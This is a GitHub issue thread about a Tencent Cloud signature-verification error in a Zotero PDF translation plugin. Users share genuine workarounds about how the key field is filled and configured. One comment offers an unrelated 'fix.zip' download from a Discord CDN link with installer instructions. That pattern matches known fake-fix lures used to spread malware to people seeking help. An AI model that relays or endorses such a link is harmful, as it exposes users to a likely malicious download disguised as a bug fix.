### ISSUE TITLE
[Bug] 腾讯云翻译 AuthFailure.SignatureFailure:请求签名验证失败，请检查您的签名计算是否正确。

### ISSUE THREAD

**Issue by zghncszdy** [windingwind/zotero-pdf-translate#932]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Have you checked the FAQ (https://github.com/windingwind/zotero-pdf-translate/issues/6)?

- [X] I have checked the FAQ

### Are you using the latest Zotero and the latest plugin?

- [X] I have confirmed I'm using the latest Zotero and the latest plugin

### Environment

- OS: Windows 11 23H2
- Zotero Version: 7.0.3 (64-bit)
- Plugin Version: 2.0.0

### Describe the bug

你好！
如标题所言，使用的的目前最新版本的插件。
按照要求设置做完设置之后，使用腾讯云翻译api一直出现签名错误。
插件运行时显示如下错误：
`Service error: AuthFailure.SignatureFailure:请求签名验证失败，请检查您的签名计算是否正确。`
<img width="403" alt="Snipaste_2024-09-03_21-18-46" src="https://github.com/user-attachments/assets/4723b49b-1c1a-4421-a351-79ba7b4c1325">

### Debug Output

插件-密钥一栏严格按照以下格式填写：
`SecretId#SecretKey`
腾讯云api密钥管理后台显示确实有访问记录，但是无法输出翻译文本。
不懂编程，第一次提issue，有描述不清楚的地方请指出，一定补充！！

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by festla** [comment]
这个问题怎么解决的

**Comment by sishuo1919** [comment]
> 这个问题怎么解决的

我这边直接删除掉‘密钥’一栏中的所有内容，留空，然后直接点配置，填写后关闭，问题解决。你可以尝试一下

**Comment by festla** [comment]
我的解决方法是根据腾讯的密钥格式：SecretId#SecretKey 填写完密钥之后不要点配置，就可以正常使用翻译了；否则后面会多出#shanghai#0两个字段，就会不断报上面的错误。
